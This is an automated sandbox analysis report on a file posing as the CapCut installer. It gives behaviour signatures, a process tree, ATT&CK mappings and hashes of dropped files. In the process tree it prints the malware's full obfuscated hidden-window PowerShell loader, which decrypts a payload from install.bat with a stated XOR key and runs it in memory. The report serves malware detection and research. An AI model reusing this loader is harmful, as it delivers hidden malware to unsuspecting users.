640a873a9bdc77ddd340a9196fece62dcbfd3e6bdeec787f60d882a59a4ca264

Analysis

max time kernel
177s
max time network
212s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
02-10-2024 05:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CapCut.exe
Size

133.1MB
MD5

386d607b4ca8d760db1d6e72eaef4bd1
SHA1

58a800bca6ab2b324388fd330b17300ef9a1fef5
SHA256

a73fc2f0d7f187d75f1f04080f6ebc9791fe9b0911bb602da88b892e98f48b34
SHA512

c7ccfc5cb8d73ca1b54bc39226aff665d1612bde5bd1a827485bf80927a530565a77a193a34c916e0135c6f0b41fc3113029f28671153ad2e43d34f5100e3466
SSDEEP

1572864:C2HVo9Ck+yOBBdJAVwlymAETslfp409t:49Ctx3tu

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1708	powershell.exe

Downloads MZ/PE file

Patched UPX-packed file 1 IoCs

Sample is packed with UPX but required header fields are zeroed out to prevent unpacking with the default UPX tool.

resource	yara_rule
behavioral11/files/0x0005000000019668-273.dat	patched_upx

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Control Panel\International\Geo\Nation	CapCut.exe
Key value queried	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Control Panel\International\Geo\Nation	CapCut.exe

Executes dropped EXE 11 IoCs

pid	Process
1536	php.exe
2728	php.exe
264	rhc.exe
788	php.exe
1080	rhc.exe
1216	php.exe
1680	rhc.exe
1480	rhc.exe
1816	php.exe
1972	rhc.exe
1784	php.exe

Loads dropped DLL 64 IoCs

pid	Process
2812	CapCut.exe
2812	CapCut.exe
1536	php.exe
1536	php.exe
2812	CapCut.exe
2728	php.exe
2728	php.exe
2728	php.exe
2728	php.exe
2728	php.exe
2728	php.exe
2728	php.exe
2728	php.exe
2728	php.exe
2728	php.exe
2728	php.exe
2728	php.exe
2728	php.exe
2728	php.exe
264	rhc.exe
1080	rhc.exe
3040	Process not Found
788	php.exe
920	Process not Found
1216	php.exe
1216	php.exe
1216	php.exe
788	php.exe
1216	php.exe
1216	php.exe
1216	php.exe
1216	php.exe
1216	php.exe
1216	php.exe
1216	php.exe
1216	php.exe
1216	php.exe
1216	php.exe
1216	php.exe
788	php.exe
788	php.exe
788	php.exe
788	php.exe
788	php.exe
788	php.exe
788	php.exe
788	php.exe
788	php.exe
788	php.exe
788	php.exe
788	php.exe
1480	rhc.exe
3000	Process not Found
1816	php.exe
1816	php.exe
1816	php.exe
1816	php.exe
1816	php.exe
1816	php.exe
1816	php.exe
1816	php.exe
1816	php.exe
1816	php.exe
1816	php.exe

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1680	rhc.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2812	CapCut.exe
2676	CapCut.exe
2336	CapCut.exe
1216	php.exe
900	powershell.exe
1816	php.exe
1708	powershell.exe
1784	php.exe
3032	CapCut.exe
3032	CapCut.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	900	powershell.exe
Token: SeDebugPrivilege	1708	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3032 wrote to memory of 2812	3032	CapCut.exe	30
PID 3032 wrote to memory of 2812	3032	CapCut.exe	30
PID 3032 wrote to memory of 2812	3032	CapCut.exe	30
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2884	3032	CapCut.exe	31
PID 3032 wrote to memory of 2676	3032	CapCut.exe	32
PID 3032 wrote to memory of 2676	3032	CapCut.exe	32
PID 3032 wrote to memory of 2676	3032	CapCut.exe	32
PID 3032 wrote to memory of 2336	3032	CapCut.exe	33
PID 3032 wrote to memory of 2336	3032	CapCut.exe	33
PID 3032 wrote to memory of 2336	3032	CapCut.exe	33
PID 3032 wrote to memory of 2104	3032	CapCut.exe	34
PID 3032 wrote to memory of 2104	3032	CapCut.exe	34
PID 3032 wrote to memory of 2104	3032	CapCut.exe	34
PID 3032 wrote to memory of 2104	3032	CapCut.exe	34
PID 3032 wrote to memory of 2104	3032	CapCut.exe	34
PID 3032 wrote to memory of 2104	3032	CapCut.exe	34
PID 3032 wrote to memory of 2104	3032	CapCut.exe	34
PID 3032 wrote to memory of 2104	3032	CapCut.exe	34
PID 3032 wrote to memory of 2104	3032	CapCut.exe	34
PID 3032 wrote to memory of 2104	3032	CapCut.exe	34
PID 3032 wrote to memory of 2104	3032	CapCut.exe	34
PID 3032 wrote to memory of 2104	3032	CapCut.exe	34
PID 3032 wrote to memory of 2104	3032	CapCut.exe	34
PID 3032 wrote to memory of 2104	3032	CapCut.exe	34

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\CapCut.exe
"C:\Users\Admin\AppData\Local\Temp\CapCut.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3032
- C:\Users\Admin\AppData\Local\Temp\CapCut.exe
  C:\Users\Admin\AppData\Local\Temp\CapCut.exe C:\Users\Admin\AppData\Local\Temp\resources\app.asar\dist\temp\temp
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:2812
- - C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe
    C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe -v
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1536
- - C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe
    C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe -v
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2728
- - C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe
    C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe C:\Users\Admin\AppData\Roaming\dcw_global\app\include.php
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:264
  - - C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe
      C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe C:\Users\Admin\AppData\Roaming\dcw_global\app\include.php
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:788
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "PowerShell -c "Get-Date -Format 'yyyy-MM-dd HH:mm:ss'""
        5⤵
        
        PID:1924
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -c "Get-Date -Format 'yyyy-MM-dd HH:mm:ss'"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:900
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c ""C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe" "C:\ProgramData\install.bat""
        5⤵
        
        PID:2936
      - C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe
        
        "C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe" "C:\ProgramData\install.bat"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1680
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\ProgramData\install.bat""
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1748
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\ProgramData\install.bat"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c $taHD='C:\ProgramData\install.bat';$NtIb='FHirslHirsusHirshHirs'.Replace('Hirs', '');$ObcK='WHirsrHirsiHirstHirse'.Replace('Hirs', '');$ArEi='RHirseHirsaHirsd'.Replace('Hirs', '');$JrMk='LHirsoHirsaHirsd'.Replace('Hirs', '');$zoKG='EHirsnHirstHirsryHirsPoHirsinHirst'.Replace('Hirs', '');$ddJZ='IHirsnHirsvoHirskHirse'.Replace('Hirs', '');$UHEF='FrHirsoHirsmBHirsasHirse6Hirs4HirsSHirstrHirsinHirsg'.Replace('Hirs', '');$SPyy='MHirsaHirsinHirsMoHirsdHirsuHirsle'.Replace('Hirs', '');$VaHf='GHirseHirstHirsCuHirsrrHirsenHirstPHirsroHirsceHirsss'.Replace('Hirs', '');$PDYZ='ElHirsemHirsenHirstAHirst'.Replace('Hirs', '');$Retn='ReHirsadHirsLiHirsnHirseHirss'.Replace('Hirs', '');$Hdbx='ChHirsaHirsnHirsgeHirsExHirstHirseHirsnsHirsiHirsoHirsnHirs'.Replace('Hirs', '');$ublZB=[System.Linq.Enumerable]::$PDYZ([System.IO.File]::$Retn($taHD), 1);$YXXGq=$ublZB.Substring(2);function cSUex($kGFsz){$SjAZa=New-Object System.IO.MemoryStream(,$kGFsz);$zIanR=New-Object System.IO.MemoryStream;$vRvnd=New-Object System.IO.Compression.GZipStream($SjAZa,[IO.Compression.CompressionMode]::Decompress);$hRgEv = New-Object System.IO.BinaryWriter($zIanR);$bRTaW = New-Object byte[](1024);while($true){$FgteA = $vRvnd.$ArEi($bRTaW,0,1024);if($FgteA -le 0){break;}$hRgEv.$ObcK($bRTaW,0,$FgteA);$hRgEv.$NtIb();}$vRvnd.Dispose();$SjAZa.Dispose();$hRgEv.Close();$zIanR.Dispose();$zIanR.ToArray();}function JeGso($kGFsz){$PzChi=[System.Convert]::$UHEF('7hl8HDjB6KYIKdxWsK/Yv3pcVj44gbOTziIiPQGMP4k=');For ($i=0; $i -lt $kGFsz.Length; $i++){$ix = $i % $PzChi.Length;$kGFsz[$i] = $kGFsz[$i] -bxor $PzChi[$ix];}$kGFsz;}$YjPOO = cSUex(JeGso([System.Convert]::$UHEF($YXXGq)));[System.Reflection.Assembly]::$JrMk([byte[]]$YjPOO).$zoKG.$ddJZ($null,$null);
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1708
- - C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe
    C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe C:\Users\Admin\AppData\Roaming\dcw_global\app\index.php
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1080
  - - C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe
      C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe C:\Users\Admin\AppData\Roaming\dcw_global\app\index.php
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:1216
- C:\Users\Admin\AppData\Local\Temp\CapCut.exe
  "C:\Users\Admin\AppData\Local\Temp\CapCut.exe" --type=gpu-process --field-trial-handle=936,11692247991448239703,11826504244977613730,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --user-data-dir="C:\Users\Admin\AppData\Roaming\capcut" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAANAAAAEAAAAAAAAAABAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=948 /prefetch:2
  2⤵
  PID:2884
- C:\Users\Admin\AppData\Local\Temp\CapCut.exe
  "C:\Users\Admin\AppData\Local\Temp\CapCut.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=936,11692247991448239703,11826504244977613730,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\capcut" --standard-schemes=app --secure-schemes=app --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --mojo-platform-channel-handle=1292 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2676
- C:\Users\Admin\AppData\Local\Temp\CapCut.exe
  "C:\Users\Admin\AppData\Local\Temp\CapCut.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\capcut" --standard-schemes=app --secure-schemes=app --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-path="C:\Users\Admin\AppData\Local\Temp\resources\app.asar" --no-sandbox --no-zygote --node-integration-in-worker --field-trial-handle=936,11692247991448239703,11826504244977613730,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1672 /prefetch:1
  2⤵
  - Checks computer location settings
  - Suspicious behavior: EnumeratesProcesses
  PID:2336
- C:\Users\Admin\AppData\Local\Temp\CapCut.exe
  "C:\Users\Admin\AppData\Local\Temp\CapCut.exe" --type=gpu-process --field-trial-handle=936,11692247991448239703,11826504244977613730,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --user-data-dir="C:\Users\Admin\AppData\Roaming\capcut" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAANAAAAEAAAAAAAAAABAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1236 /prefetch:2
  2⤵
  PID:2104

C:\Windows\system32\taskeng.exe
taskeng.exe {54E5A5CE-6C68-4006-9606-7E1AEA4F2D34} S-1-5-21-457978338-2990298471-2379561640-1000:WOUOSVRD\Admin:Interactive:[1]
1⤵
PID:3044
- C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe
  C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe php.exe index.php
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1480
- - C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe
    php.exe index.php
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:1816
- C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe
  C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe php.exe index.php
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1972
- - C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe
    php.exe index.php
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\dcw_global\app\2d7877717f5a4981a8f18acbba5bb6a6

Filesize
621KB

MD5
2d7877717f5a4981a8f18acbba5bb6a6

SHA1
5909551cf038c3e8962be91eda14ed99b840deee

SHA256
4dc28b034578611ce37d63707b6400e748eb298e4e635881dad4649dc10135a8

SHA512
3046471ad131f8f2cec0024a985f879ecefc6124ecbcc736896ae599982e409db791b14c9c64171cea780691f9f85e424e1719ff76eb0ab647fc2184f7f97799

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\350ab511c210c7762a2fef151a4ca075

Filesize
134KB

MD5
350ab511c210c7762a2fef151a4ca075

SHA1
a5163f62c97e4d0b5bcd4bf9c7e490470b7d4444

SHA256
2b609fe8a08b7c88cfc7829a85407f0ff588d7ee2e073ce874e847e9323cfacc

SHA512
937cca9fe82eaf9fa444448de9638392c90bdb02a06548ed47fa97790c11d3eca9a73143f1e82d48f7f4d2cd136711812801492576bbc1c9f0edb35399709815

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\LIBEAY32.dll

Filesize
2.2MB

MD5
72ab83ee24009ea1d6f47db123abcef0

SHA1
f1152140367f0ad1224d3d811797878b0048a664

SHA256
9a5db002753a627ed51484eb88e6aa9c7bad10c120c772eaa5e7ce826d92af64

SHA512
1ee0c50e0e5c9ea1736729eba7e38097ccd2fa7729fb4b0d634229c1a103bf4122afd2060a8c418db5a1b948605a310e31dcd1d235aa098ea0373083322eddbb

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\SSLEAY32.dll

Filesize
348KB

MD5
6e59ae2ea370b626db1097d2aae8f82d

SHA1
a4950d9ffb4e3d377faf815580cc2ac94a0b5d7f

SHA256
232b6e686b151056109587faa7f9cce500a85ad123b8832a3e833d67d4b4e588

SHA512
c8dc0b6037d1de4c334f5ca87e22f7f7d672806114bb8ff330100664a38d5c0f276fc2fdb26718535f8803de9828c50e511df97e6eaf96e00e87e4a086b07157

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_openssl.dll

Filesize
100KB

MD5
61999febf6b2e8a5fd9d721022c8486b

SHA1
bf8cb2dc8cce2d36751c3694b5e7f663f144be2f

SHA256
1ab58d6762f12a5bf9a4c4bc5c474257c1f468fa69b0677252921020f9b55a7b

SHA512
3bdec1b6f5d34d0620dbaaa4386beaff7c2e7946bd56b10b87dc5f30578956d7f5baad2ab51f2cf95ccf6e6d4bf155cb8ddabdeded7f133921227dd98a52e7bb

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\libssh2.dll

Filesize
208KB

MD5
63ebfa6a323708e5e09a82ddaa7261ec

SHA1
80283697551ef70a7877a72be8826b9915efd82b

SHA256
b1438bd5de2961d71a028ca5ac38507ff2e6e3577e4649a8fc5262f8c82cc8aa

SHA512
32326463073671f351ecf9d448aa48b5ef6c3dea7d6aceec3f9fe25565fbc23511864b725edf5a378467aaf7bf1562893f81e10223ad52a56b90ce9d8ebaff44

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\php.ini

Filesize
3KB

MD5
52cf38e98776a3135413c29d89e25d6f

SHA1
573309bb3951e37bdbff44ab9d973017a396297c

SHA256
5a21a30bab62b2971a31b01712ed1e703fc9f20fee773cc005ee308c4628427b

SHA512
fddb2502f77405b6bfe8d3926f146ef184350542937f29c8ddae3dc31f3b8908c744ae56561b49c9b5f57287b686d0d49117daff6988a0f351418c40f28fe85a

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\php5.dll

Filesize
7.8MB

MD5
7e7576314844051ceefa1820d20d7e6c

SHA1
3fe8f1b89d72246919fd2bfab8778e54fb8bc1f2

SHA256
e40184b3e5ff76fbc0f777f4717f2825531b0169bcdca13623254aa00584bea9

SHA512
364e5c0e8853af49919867e18bc5aebc4af8203ecf940706173147d57ff9038f35c93583f45b066f1aeb6fec2f4c6d47d4cd024e945ac8dd30fe105a6eefdcb7

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe

Filesize
1KB

MD5
abc6379205de2618851c4fcbf72112eb

SHA1
1ed7b1e965eab56f55efda975f9f7ade95337267

SHA256
22e7528e56dffaa26cfe722994655686c90824b13eb51184abfe44d4e95d473f

SHA512
180c7f400dd13092b470e3a91bf02e98ef6247c1193bf349e3710e8d1e9003f3bc9b792bb776eacb746e9c67b3041f2333cc07f28c5f046d59274742230fb7c1

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\zin.zip

Filesize
22.0MB

MD5
ff6d446d8221db6e72df5368f46ba8e9

SHA1
8263b78eea17a07605f15140f5379cc4ea2fee3c

SHA256
3d7668280fa4b16f70705539ba1e4ea17eef344c81e82881cbeca26fb7f181f1

SHA512
2ada13dac5563c8aab1aa5da6b0b570480bd09f4ed673d721f9caa7b6032ff1aa555ae08e2a38eedc0e81cc3b200595a96369b23e1d74dcfb1ace093b6bd98e3

Download Submit
\Users\Admin\AppData\Roaming\dcw_global\app\ext\ioncube\ioncube_loader_win_5.6.dll

Filesize
916KB

MD5
db7b67aa2d1744b8d55aa3ae1f0aad95

SHA1
a05fe65d4cdb8b8e3c29c900bd2cb8272668d627

SHA256
d768ca023105c16421f921e5ea4106c456ceb8b0c709ac874d33c63c7ece4ab1

SHA512
084ffd496cd7d92eaee814f36f9e1e5a001979ee8cfcd13630ca26d7157e9f584018ee090a29978c5b45179b8b8e74238ac5c37b28f5d9672ffa1798dea12482

Download Submit
\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_bz2.dll

Filesize
77KB

MD5
82ecccc4d0a15a29af540d9c3fc383ca

SHA1
5afac221180db13b9ba609c0dd03cc915cc17d54

SHA256
82825b06716705b65d69a8184f2ae83c1e02d2fa468a5a6933f023a29bbf0b61

SHA512
76541c44890dbc17f6153960710e5d48df5af8a18b69880e83fe22295f47bcd5deb06edbb45f252d98105e0254f7688a38c97ca6df966f16b3d96ecec8304fa3

Download Submit
\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_com_dotnet.dll

Filesize
83KB

MD5
1d0672d627cb8495ee3633e50a421b1a

SHA1
06180e6ae0fc4e069254ef58ec1d3b336608eea8

SHA256
f5226cea250c1e786531a0b62b3cf55307f76d74b4839b622ef9bba4dc34695e

SHA512
dfb9c2580fb51bb766beefca978ebec153d223727fba9cddbe9ca712eee0035befc8cf622e306e910868f59ef7ac17699fe07373a6e5b5f5f8b703c60f0bbbb4

Download Submit
\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_curl.dll

Filesize
492KB

MD5
c398bd14714253f5b82858c35c28fae9

SHA1
c1a2bd5083ae6780b0e3dc5b4feea58b082eec85

SHA256
f48a6fb640c77418f41c9afe82ab915fcd7228f4517d8905943e0cd2c8f6e018

SHA512
a9bcc484b1731b86e05be807832bfb808f0ff92155859f53a243cbd2591aab610362579cfc375da713d09d256602481d0f2cc86e4cd4925d60bd3c32ce912408

Download Submit
\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_fileinfo.dll

Filesize
2.7MB

MD5
6606cab4a5f76f69fba6666bd063f5bc

SHA1
0490ad0d479e35d09f597cc50fba2720b18971f3

SHA256
ad201ec9f0297306f9deedf885d2582af5bd8960bb461763d070125f26ac89fa

SHA512
9745c52da604e89366256f583ec0b178ee021d4ddf7c728698b700a1c0345e90777b52b05bdab459c0f6bd3423d7969722a90ae14097ddd5eccd3c5333b55fed

Download Submit
\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_gd2.dll

Filesize
1.4MB

MD5
0d1116df0c3be38c5cd037093a16c73a

SHA1
af6c2018cb765ac9521323cae135d44adeb04f77

SHA256
30c89e81d43a692defa515ccd91ce0b45fa8fa1a6ac444b4b6f56943355c945c

SHA512
330e0c1354ea7e4d803c00588c410f0b1675972447cb7c3e6eaad7513fa717bcc7e0b5c77981edf1e56ba1d7ddbbe9317a967a62ba320d4f061de0b8e218fa25

Download Submit
\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_mbstring.dll

Filesize
1.3MB

MD5
777de2e4423dbef2de8dc9461382d15a

SHA1
cf2283da35aea738f56cdde18a33f5dc8919c9db

SHA256
be689f1c4947ba9356fa79bda4d6601e95408bd415084b6232e289943fbd85ba

SHA512
0229d8414cf55f246f0b8434e41886db6d4eca4a781fe61c8b634c12843ec923b5d0a88dfe841799be8eb1c6e7cb0d608b26c089e86e3596322989223d902183

Download Submit
\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_pdo_sqlite.dll

Filesize
577KB

MD5
843f0185dcc847a44ebb21aa08f3daeb

SHA1
9d2214cb66a332725eb196b8a33182bb8155fcb7

SHA256
301d90953cbcc314082f92eb360f3355b297093e35907bb710127242f5c50297

SHA512
2c1570469ed81274bc7a120b3274cb6de211c1267a79dbf5898defbd14124657778d772fa0b61fd589db31bb5b162bffe14a8cef571de0ae00129adf142d0b48

Download Submit
\Users\Admin\AppData\Roaming\dcw_global\app\msvcr110.dll

Filesize
829KB

MD5
7c3b449f661d99a9b1033a14033d2987

SHA1
6c8c572e736bc53d1b5a608d3d9f697b1bb261da

SHA256
ae996edb9b050677c4f82d56092efdc75f0addc97a14e2c46753e2db3f6bd732

SHA512
a58783f50176e97284861860628cc930a613168be70411fabafbe6970dcccb8698a6d033cfc94edf415093e51f3d6a4b1ee0f38cc81254bdccb7edfa2e4db4f8

Download Submit
\Users\Admin\AppData\Roaming\dcw_global\app\php.exe

Filesize
76KB

MD5
34f95889380b92044e958eab7fb561b1

SHA1
fbf6a62f4523b0a0316db49d277b69021136457a

SHA256
6845b8905a3fade342f427af97875118d4c7fb3d382cda245dc77e1cb930464c

SHA512
9274003a161c714373999ba71d51557cc718ee3ecfa57f82691b9edd3d682e13c59da1d1ba8a8858b58ecc981f29f1b01ed31528b65844046a2cd659bc28b9d9

Download Submit
memory/900-345-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

Filesize
2.9MB

Download
memory/900-346-0x0000000002460000-0x0000000002468000-memory.dmp

Filesize
32KB

Download
memory/1080-315-0x0000000000400000-0x0000000000402000-memory.dmp

Filesize
8KB

Download
memory/1216-328-0x0000000000A40000-0x0000000000A78000-memory.dmp

Filesize
224KB

Download
memory/1784-361-0x0000000000B60000-0x0000000000B98000-memory.dmp

Filesize
224KB

Download
